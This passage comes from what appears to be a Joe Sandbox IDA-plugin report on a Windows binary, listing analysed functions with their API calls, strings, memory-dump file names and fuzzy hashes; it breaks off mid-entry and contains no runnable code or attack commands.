Function 00257464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0025747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00257497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002574AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002574CA

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 3567841380790274bdd1f6b29c67ef9d0c850f3a47b01e53d114db43c595c2af
Instruction ID: 167293fcb3ea61d5d7cf62599a7cf77f625c5a8221f82a1c9883d15a49a382fd
Opcode Fuzzy Hash: 3567841380790274bdd1f6b29c67ef9d0c850f3a47b01e53d114db43c595c2af
Instruction Fuzzy Hash: BA11ADB5266311ABF7208F24FC0CF927BFCEB00B01F208569AE16D6191D7B0E958DB65

Function 0025B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0025ACD3,?,00008000), ref: 0025B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0025ACD3,?,00008000), ref: 0025B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0025ACD3,?,00008000), ref: 0025B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0025ACD3,?,00008000), ref: 0025B126

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 0677a74317c39c091481097ca96ebd47122f7f43d6b0e3003b69faa102f61de8
Instruction ID: f5eb7ecf29a6cb72eb523f913b123a7f54a5a019b0baa69b74272c7fbb683b66
Opcode Fuzzy Hash: 0677a74317c39c091481097ca96ebd47122f7f43d6b0e3003b69faa102f61de8
Instruction Fuzzy Hash: F4118E30C2191DD7CF01AFE5E99C6EEBB78FF09312F108095D945B2181CB3085648B65

Function 00252DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00252DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00252DD6
GetCurrentThreadId.KERNEL32 ref: 00252DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00252DE4

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 567ec4837426b2970497a3e6097536fbf283042a31ba42ea94e394de59daa34d
Instruction ID: e1163b9b4a241b0b4ef7f6152460337ebc100ab88b8fdd8c69fba9ecb08b3141
Opcode Fuzzy Hash: 567ec4837426b2970497a3e6097536fbf283042a31ba42ea94e394de59daa34d
Instruction Fuzzy Hash: 05E06D75112234BAD7201B62AC0DEEB3E6CEB83BA2F100125B905D1080ABB48848C7B0

Function 00288863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00209639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00209693
Part of subcall function 00209639: SelectObject.GDI32(?,00000000), ref: 002096A2
Part of subcall function 00209639: BeginPath.GDI32(?), ref: 002096B9
Part of subcall function 00209639: SelectObject.GDI32(?,00000000), ref: 002096E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00288887
LineTo.GDI32(?,?,?), ref: 00288894
EndPath.GDI32(?), ref: 002888A4
StrokePath.GDI32(?), ref: 002888B2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: dd574ec83a317ee5c73bfd749d9d4649a2e2ffcd8d943873910b6e0997c87158
Instruction ID: 7d3034668dc36cfc1d468720d85121a5b481b1fbbb9206a040fe692ad1411faf
Opcode Fuzzy Hash: dd574ec83a317ee5c73bfd749d9d4649a2e2ffcd8d943873910b6e0997c87158
Instruction Fuzzy Hash: 7EF0343A052259BAEB126F94AC0EFCA3A69AF06310F548000FA12650E2C7B55561CFA9

Function 002098B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 002098CC
SetTextColor.GDI32(?,?), ref: 002098D6
SetBkMode.GDI32(?,00000001), ref: 002098E9
GetStockObject.GDI32(00000005), ref: 002098F1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 033d1fd3b91ce7fa4d31a3c7e094c46bf25185b525138ca0912bbece538ceec1
Instruction ID: 27455d590ee934093d80b0592040af7c2226aa48f2b131bc7f5bfafb07957f71
Opcode Fuzzy Hash: 033d1fd3b91ce7fa4d31a3c7e094c46bf25185b525138ca0912bbece538ceec1
Instruction Fuzzy Hash: F7E06D35245284AEDF215F74BC0DBE83F20AB12336F24821AF6FA580E2C37146509B20

Function 0025162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00251634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002511D9), ref: 0025163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002511D9), ref: 00251648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002511D9), ref: 0025164F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: b0e6d07c17617bf059ad9cfe372cff901fa4a0d00882a0aeb5273dac3f5b2b6e
Instruction ID: fe486ff467fc44666e014e466b0658dc4732c8ec5f31e65405ba3afef9c8f63a
Opcode Fuzzy Hash: b0e6d07c17617bf059ad9cfe372cff901fa4a0d00882a0aeb5273dac3f5b2b6e
Instruction Fuzzy Hash: F1E0463A602212ABD7202FB0BE0DB863B6CAF45792F298808FA45C9080E73488558B64

Function 0024D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0024D858
GetDC.USER32(00000000), ref: 0024D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0024D882
ReleaseDC.USER32(?), ref: 0024D8A3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b688249e550b5c3c04088a8335212e8839299dd00668b3b67976107d49f27f30
Instruction ID: ee1c53885f61b3c4c482a7ed7dc04c290d908e44ac0a5d7ecff70f4c1642aeb9
Opcode Fuzzy Hash: b688249e550b5c3c04088a8335212e8839299dd00668b3b67976107d49f27f30
Instruction Fuzzy Hash: 01E01AB8811215DFCB419FB0E90C66DFBB6FB48310F248019E916E7250D7785911AF60

Function 0024D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0024D86C
GetDC.USER32(00000000), ref: 0024D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0024D882
ReleaseDC.USER32(?), ref: 0024D8A3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d17be1b9ccf23a5af03af0e59d7da02f0a917056b0eedf268b4592d04ddf1058
Instruction ID: 0176f32456def73d957ddc2352b3746b5e2401ae705107e396c140be8613aa80
Opcode Fuzzy Hash: d17be1b9ccf23a5af03af0e59d7da02f0a917056b0eedf268b4592d04ddf1058
Instruction Fuzzy Hash: 24E01A78801214DFCB409FB0E80C66DBBB5BB48310B248018E91AE7250D7385901AF60

Function 00264D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 001F7620: _wcslen.LIBCMT ref: 001F7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00264ED4

Strings

*, xrefs: 00264E10
LPT, xrefs: 00264DFB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 36c6c94936a37b0c9183bf316653ec98d452c8a0a455064ff9e0951a04522d52
Instruction ID: dcfb936480878f9d79279ce6a60e4ff11b781ce9675fcc53ab4e545e9e03319c
Opcode Fuzzy Hash: 36c6c94936a37b0c9183bf316653ec98d452c8a0a455064ff9e0951a04522d52
Instruction Fuzzy Hash: 01918275A10205DFCB14EF58C484EAABBF1BF48304F188099E84A9F7A2C775ED95CB90

Function 0021E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0021E30D

Strings

pow, xrefs: 0021E2E5, 0021E302

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 12913faddfe5074608605643c2cd7481f148d4f4b46b9e77693347777c703163
Instruction ID: 9044d38bff7450e898ac17a6d453784aca836f13171f7bbe0fd81766e7baf533
Opcode Fuzzy Hash: 12913faddfe5074608605643c2cd7481f148d4f4b46b9e77693347777c703163
Instruction Fuzzy Hash: B8519A61A3C213B6CF117F64ED013FA3BE4AB60740F314999E8E5422A9DB348CF58A42

Function 00277771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0024569E,00000000,?,0028CC08,?,00000000,00000000), ref: 002778DD

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

CharUpperBuffW.USER32(0024569E,00000000,?,0028CC08,00000000,?,00000000,00000000), ref: 0027783B

Strings

<s+, xrefs: 002777C8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s+
API String ID: 3544283678-2057180819
Opcode ID: 1ed51e4e121cac1169366532556078a62b32407647fac141bd11e31d91c923c0
Instruction ID: 1df0bed661adf330c42c1ece52925160f69e5f97c6799983ff6451a4941823ad
Opcode Fuzzy Hash: 1ed51e4e121cac1169366532556078a62b32407647fac141bd11e31d91c923c0
Instruction Fuzzy Hash: 98614D7692411DEACF04EFA4CC91DFDB3B8BF24300B548125E646A7191EF745A15DBA0

Function 0020E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0020E1B1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 037340b4763a8916bcf490725b7d09c4311b3b8eabb369f5fd16886e3a64b580
Instruction ID: be882a7565edb14e86209a2908164ed75a6dfc7e42c3f348469983cd47f092c6
Opcode Fuzzy Hash: 037340b4763a8916bcf490725b7d09c4311b3b8eabb369f5fd16886e3a64b580
Instruction Fuzzy Hash: 94513475510346DFEF18DF28C481ABABBA4FF65320F254415EC919B2D1D7309DA2CBA0

Function 0020F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0020F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0020F2BB

Strings

@, xrefs: 0020F2AF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: fd8cb7b8ccd6086e71295d9f7afaa23ef1e4ee87480398cc4e50ca1bc3ebed1c
Instruction ID: 4b3b48d479bca9d91ff6f40331448c41dfb50d5f7418f83e0cf88043d0971110
Opcode Fuzzy Hash: fd8cb7b8ccd6086e71295d9f7afaa23ef1e4ee87480398cc4e50ca1bc3ebed1c
Instruction Fuzzy Hash: 1A5138714187499BD320AF14EC86BBBBBF8FF95310F81485DF29941195EF308929CB66

Function 00275745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002757E0
_wcslen.LIBCMT ref: 002757EC

Strings

CALLARGARRAY, xrefs: 002757E6, 002757EB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 31efc4cc81d291733abe5753f75438afb876e1d075fa4576d3edd45a7f44b49a
Instruction ID: 7a70d5ea6ca83e072534d69d07aca327ea06056e7de2bbca3722bc97fe8cdfd1
Opcode Fuzzy Hash: 31efc4cc81d291733abe5753f75438afb876e1d075fa4576d3edd45a7f44b49a
Instruction Fuzzy Hash: E841B331E2021A9FCB14DFA9C8859BEFBB5FF59310F148029E509A7292D7709D91CF91

Function 0026D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0026D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0026D13A

Strings

|, xrefs: 0026D10B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: ba354cad073351e319d64465217ef24d9a6eacb1cdf3a6c386da33025abb2ad4
Instruction ID: 3c40e42276cd15eadf08717fe90e47e0162542a3d251ecdb7c0325f80e810c7f
Opcode Fuzzy Hash: ba354cad073351e319d64465217ef24d9a6eacb1cdf3a6c386da33025abb2ad4
Instruction Fuzzy Hash: EC315B71D1020DABCF15EFA4CC85AEEBFB9FF15300F000059F919A6162E771AA56CB60

Function 0028356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00283621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0028365C

Strings

static, xrefs: 002835BC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 318b3114b88f919ee189e0a85b3c1eebae9d11dce9add04fa0f68ad8cbf64451
Instruction ID: b0469028d158e76bd9bcf5202411d84f8b0befa4dae53ab86469f547a9a11fe3
Opcode Fuzzy Hash: 318b3114b88f919ee189e0a85b3c1eebae9d11dce9add04fa0f68ad8cbf64451
Instruction Fuzzy Hash: B131B275121205AEDB10EF28DC40EFB73ADFF88720F508619F96597180DB30ADA1CB64

Function 00284537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0028461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00284634

Strings

', xrefs: 0028458E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 68cfa1314a1e043babf699cf0f2cbdd6f62bee82877ae405ae49b17ce71bd462
Instruction ID: da4e6094e74b4cf7bcb4bbecdffca710a983ac59460b227e4dc6f8bf98c139e5
Opcode Fuzzy Hash: 68cfa1314a1e043babf699cf0f2cbdd6f62bee82877ae405ae49b17ce71bd462
Instruction Fuzzy Hash: 1E314978A1131A9FDB14EF69C980BDE7BB9FF19300F50406AE904AB381E770A911CF90

Function 002831EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0028327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00283287

Strings

Combobox, xrefs: 00283249

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2e349b8471f41caf017b4648b2e8484f0700f4046de806104a173a9e5ef4accc
Instruction ID: 30ce618427846abb6f319f28c719ecaae47af4aad474145d7d49be1b70cd9eff
Opcode Fuzzy Hash: 2e349b8471f41caf017b4648b2e8484f0700f4046de806104a173a9e5ef4accc
Instruction Fuzzy Hash: AA1122753212097FFF25EE54DC84EBB376AEB947A4F100224FD18972D4D6319D608B60

Function 00283710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001F600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001F604C
Part of subcall function 001F600E: GetStockObject.GDI32(00000011), ref: 001F6060
Part of subcall function 001F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001F606A

GetWindowRect.USER32(00000000,?), ref: 0028377A
GetSysColor.USER32(00000012), ref: 00283794

Strings

static, xrefs: 00283757

Memory Dump Source

